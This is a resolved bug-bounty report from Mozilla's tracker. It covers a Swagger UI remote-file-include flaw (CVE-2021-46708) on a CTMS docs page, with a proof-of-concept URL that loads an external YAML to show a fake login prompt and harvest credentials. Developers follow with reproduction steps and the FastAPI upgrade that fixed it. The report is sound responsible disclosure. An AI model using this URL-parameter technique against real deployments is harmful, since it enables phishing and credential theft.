1783267 - External authentication prompt injection via unsafe remote file include at https://ctms.prod.mozilla-ess.mozit.cloud/docs

Status: RESOLVED FIXED

(Websites :: Other, task)

Description

[todayisnew]

Good day, I truly hope it treats you great on your side of the screen :)

I have found that your have a site which is vulnerable to a remote file include to an arbitrary host - in this case, I am able to load my own content from todayisnewpoc.surge.sh.

There is sanitization of the data being loaded from todayisnewpoc.surge.sh, which can prevent some common attack vectors/know payloads, but I am still able to inject a custom authentication prompt which loads when visiting the page.

This prompt is being served from an arbitrary location (authorization.site), which can be modified as needed to be as convincing as possible to any possible victim. Imagine yourdomain.authorization.site, for example. Depending on the browser being used, a message can be included along with the prompt to make it seem more trustworthy.

When a victim enters their information into the prompt, it is sent to the arbitrary location being used by the attacker (authorization.site) along with their IP address, and stored in plain text for the attacker to use when desired.

Additionally, if the victim closes the first prompt, an attacker can serve arbitrary text on the page to encourage them to authorize. If they do so by clicking on the Authorize button, then clicking on the subsequent Authorize button, the victim will again be shown my external authentication prompt from authorization.site

POC:

https://ctms.prod.mozilla-ess.mozit.cloud/docs?url=https://todayisnewpoc.surge.sh/auth2.yaml

How to fix: Restrict the ability to load external json/yaml files via the configUrl and url parameters, or implement an allowed-list for domains which can load via these parameters.

May you be well on your side of the screen :)

-Eric

Comment 1

[Graham Beckley [:grahamalama]]

This appears to be caused by us using an outdated version of FastAPI.

I was able to reproduce the bug by:

• pip installing fastapi== 0.74.1 (version currently used in CTMS) and uvicorn
• making a minimal FastAPI app:

from fastapi import FastAPI

app = FastAPI()


@app.get("/")
async def root():
    return {"message": "Hello World"}

• starting the app

uvicorn main:app 

• navigating to http://127.0.0.1:8000/docs?url=https://todayisnewpoc.surge.sh/auth2.yaml

After pip installing fastapi== 0.79.0 though, the url param seems to be ignored and no authorization popup appears.

Comment 2

[Graham Beckley [:grahamalama]]

https://github.com/mozilla-it/ctms-api/pull/397 should close this bug

Comment 3

[Graham Beckley [:grahamalama]]

The URL provided in the POC no longer triggers the authorization popup after releasing v1.8.1

https://ctms.prod.mozilla-ess.mozit.cloud/docs?url=https://todayisnewpoc.surge.sh/auth2.yaml

Comment 4

[Gene Wood [:gene]]

Attachment: ctms-prod-ui.png

Adding a screenshot of some part of the flow

Comment 5

[Gene Wood [:gene]]

The reason this fastapi upgrade fixed the issue is that in fastapi version 0.75.2 a change is added which upgrades swagger-ui from version 3.52.5 to 4.1.3.

This upgrade to swagger-ui includes this fix which mitigates CVE-2021-46708 which this bug is reporting.

Comment 6

[Frida K [:frida]]

Note from the issue in swagger-ui, https://github.com/swagger-api/swagger-ui/issues/4872, which explains the attack reported in this bug:

Additionally, the URL parameter is dangerous in general because it allows an attacker to provide a similar schema file that instead sends authorization requests to a server under an attacker’s control, which makes it much easier to trick a user into leaking their login credentials. So the URL parameter should not be allowed in any setting where authentication or other sensitive information is used. I’d recommend disabling it by default and cautioning users against enabling it.

Comment 7

[Gene Wood [:gene]]

todayisnew, thanks very much for the report. Tom will follow up with you to coordinate payment for the bounty award.